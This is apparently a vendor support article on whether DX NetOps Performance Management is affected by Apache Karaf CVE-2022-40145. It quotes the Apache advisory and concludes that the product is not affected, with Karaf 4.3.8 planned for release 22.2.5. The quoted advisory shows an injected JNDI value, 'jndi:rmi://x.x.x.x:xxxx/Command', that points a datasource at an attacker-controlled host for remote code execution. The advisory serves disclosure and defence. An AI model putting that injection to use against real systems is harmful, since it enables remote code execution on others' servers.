search cancel

Is DX NetOps Performance Management affected by Karaf vulnerability CVE-2022-40145 ?

book

Article ID: 257372

calendar_today

Updated On:

Products

DX NetOps CA Performance Management - Usage and Administration

Issue/Introduction

Is DX NetOps Performance Management affected by the Karaf vulnerability CVE-2022-40145 ?

Details on this vulnerability:
https://karaf.apache.org/security/cve-2022-40145.txt

CVE-2022-40145: LDMP injection vulnerability in JDBC Login Module with JDK 8

Severity: Low

Vendor: The Apache Software Foundation

Versions Affected: all versions of Apache Karaf prior to 4.3.8 or 4.4.2

Description:

This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.

The method jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasourceuse uses InitialContext.lookup(jndiName) without filtering.
An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup.
This is vulnerable to a remote code execution (RCE) attack when aconfiguration uses a JNDI LDAP data source URI when an attacker hascontrol of the target LDAP server.

This has been fixed in revision:

https://gitbox.apache.org/repos/asf?p=karaf.git;h=3819f48341
https://gitbox.apache.org/repos/asf?p=karaf.git;h=2a933445d1

Mitigation: Apache Karaf users should upgrade to 4.3.8 or 4.4.2
or later as soon as possible, or use correct path.

Environment

Release : 21.2.x - 22.2.x

Resolution

NetOps Performance Management is not affected by this vulnerability as it doesn't use the vulnerable JDK 8 and JDBCUtils module.

In addition, NetOps Performance Management release 22.2.5 will have Karaf 4.3.8 delivered to address other vulnerabilities. 

NetOps Performance Management is not affected by this vulnerability because it does not use the specific vulnerable modules, and also in release 22.2.5 will have Karaf upgraded to version 4.3.8 where this is fixed.